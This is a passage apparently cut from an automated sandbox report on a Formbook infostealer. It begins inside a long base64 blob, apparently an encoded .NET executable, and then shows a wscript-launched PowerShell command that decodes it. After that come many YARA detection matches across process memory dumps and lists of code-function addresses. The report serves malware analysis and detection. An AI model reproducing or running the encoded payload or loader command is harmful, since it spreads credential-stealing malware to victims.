AACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwHChKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBYoSgAABnItAABwFyhKAAAGbyUAAApyMQAAcBgoSgAABnI/AABwHChKAAAGbyUAAApyQwAAcBwoSgAABnJPAABwHihKAAAGbyUAAApyUwAAcBgoSgAABnJfAABwHShKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwHShKAAAGbyUAAApyeQAAcBwoSgAABnKLAABwFyhKAAAGbyUAAApyjwAAcB4oSgAABnKhAABwHihKAAAGbyUAAApypQAAcBwoSgAABnKxAABwGChKAAAGbyUAAApytQAAcBsoSgAABnLHAABwGyhKAAAGbyUAAApyywAAcBwoSgAABnLdAABwGShKAAAGbyUAAApy4QAAcB0oSgAABnLzAABwGihKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNy9wAAcBooSgAABhYoKAAACjoEAQAAHxooKQAACiVy+wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcv8AAHAdKEoAAAYoKwAACgxyCQEAcB0oSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyFQEAcBkoSgAABm8xAAAKEQVyiQEAcBooSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL7AQBwHChKAAAGF283AAAKDRk4mP3//wlvOAAACnJXAgBwHChKAAAGKAIAACstEglyYQIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcmsCAHAdKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyCQEAcB0oSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcm8CAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyeQIAcBwoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcn0CAHAeKEoAAAZvMQAAChEJcvECAHAXKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyYwMAcBYoSgAABnJ/AwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcoEDAHAeKEoAAAYXjQYAAAElFnKfAwBwGihKAAAGohQUFChDAAAKKEQAAApyrwMAcBYoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHLLAwBwHChKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCA
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJmMmGQAAAAAAAAAAOAAAiELAVAAAEYAAAAGAAAAAAAAGmQAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMVjAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAADEYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAIEQAAAAgAAAARgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABIAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAATAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAD5YwAAAAAAAEgAAAACAAUAuDEAAAQvAAADAAAAAAAAALxgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwHChKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBYoSgAABnItAABwFyhKAAAGbyUAAApyMQAAcBgoSgAABnI/AABwHChKAAAGbyUAAApyQwAAcBwoSgAABnJPAABwHihKAAAGbyUAAApyUwAAcBgoSgAABnJfAABwHShKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwHShKAAAGbyUAAApyeQAAcBwoSgAABnKLAABwFyhKAAAGbyUAAApyjwAAcB4oSgAABnKhAABwHihKAAAGbyUAAApypQAAcBwoSgAABnKxAABwGChKAAAGbyUAAApytQAAcBsoSgAABnLHAABwGyhKAAAGbyUAAApyywAAcBwoSgAABnLdAABwGShKAAAGbyUAAApy4QAAcB0oSgAABnLzAABwGihKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNy9wAAcBooSgAABhYoKAAACjoEAQAAHxooKQAACiVy+wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcv8AAHAdKEoAAAYoKwAACgxyCQEAcB0oSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyFQEAcBkoSgAABm8xAAAKEQVyiQEAcBooSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL7AQBwHChKAAAGF283AAAKDRk4mP3//wlvOAAACnJXAgBwHChKAAAGKAIAACstEglyYQIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcmsCAHAdKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyCQEAcB0oSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcm8CAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyeQIAcBwoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcn0CAHAeKEoAAAZvMQAAChEJcvECAHAXKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyYwMAcBYoSgAABnJ/AwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcoEDAHAeKEoAAAYXjQYAAAElFnKfAwBwGihKAAAGohQUFChDAAAKKEQAAApyrwMAcBYoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHLLAwBwHChKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCAJump to behavior
          Very long command line found
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 27014
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 27014Jump to behavior
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.906043086.000000000756C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: powershell.exe PID: 5468, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 5896, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmmon32.exe PID: 5912, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFBAC3805E51_2_00007FFBAC3805E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041DACA3_2_0041DACA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041EC8C3_2_0041EC8C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041DD1A3_2_0041DD1A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00409E4B3_2_00409E4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00409E503_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041DEEF3_2_0041DEEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041E7043_2_0041E704
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041E7D13_2_0041E7D1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5EBB03_2_03A5EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE03DA3_2_03AE03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEDBD23_2_03AEDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF2B283_2_03AF2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4AB403_2_03A4AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF22AE3_2_03AF22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADFA2B3_2_03ADFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A441203_2_03A44120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2F9003_2_03A2F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A520A03_2_03A520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF20A83_2_03AF20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3B0903_2_03A3B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF28EC3_2_03AF28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFE8243_2_03AFE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE10023_2_03AE1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF1FF13_2_03AF1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFDFCE3_2_03AFDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF2EF73_2_03AF2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A46E303_2_03A46E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AED6163_2_03AED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A525813_2_03A52581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3D5E03_2_03A3D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF25DD3_2_03AF25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A20D203_2_03A20D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF2D073_2_03AF2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF1D553_2_03AF1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3841F3_2_03A3841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AED4663_2_03AED466
          Source: C:\Windows\explorer.exeCode function: 4_2_075542324_2_07554232
          Source: C:\Windows\explorer.exeCode function: 4_2_075519124_2_07551912
          Source: C:\Windows\explorer.exeCode function: 4_2_0754BD024_2_0754BD02
          Source: C:\Windows\explorer.exeCode function: 4_2_0754EB304_2_0754EB30
          Source: C:\Windows\explorer.exeCode function: 4_2_0754EB324_2_0754EB32
          Source: C:\Windows\explorer.exeCode function: 4_2_075575CD4_2_075575CD
          Source: C:\Windows\explorer.exeCode function: 4_2_075530364_2_07553036
          Source: C:\Windows\explorer.exeCode function: 4_2_0754A0824_2_0754A082
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456841F7_2_0456841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_046110027_2_04611002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456B0907_2_0456B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_046220A87_2_046220A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A07_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04621D557_2_04621D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455F9007_2_0455F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04622D077_2_04622D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04550D207_2_04550D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045741207_2_04574120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456D5E07_2_0456D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045825817_2_04582581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04576E307_2_04576E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04622EF77_2_04622EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_046222AE7_2_046222AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04622B287_2_04622B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04621FF17_2_04621FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0461DBD27_2_0461DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458EBB07_2_0458EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BDACA7_2_001BDACA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BEC8C7_2_001BEC8C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BDD1A7_2_001BDD1A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001A2D907_2_001A2D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001A9E507_2_001A9E50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001A9E4B7_2_001A9E4B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BDEEF7_2_001BDEEF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BE7047_2_001BE704
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001A2FB07_2_001A2FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_001BE7D17_2_001BE7D1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B150 appears 48 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0455B150 appears 35 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041A350 NtCreateFile,3_2_0041A350
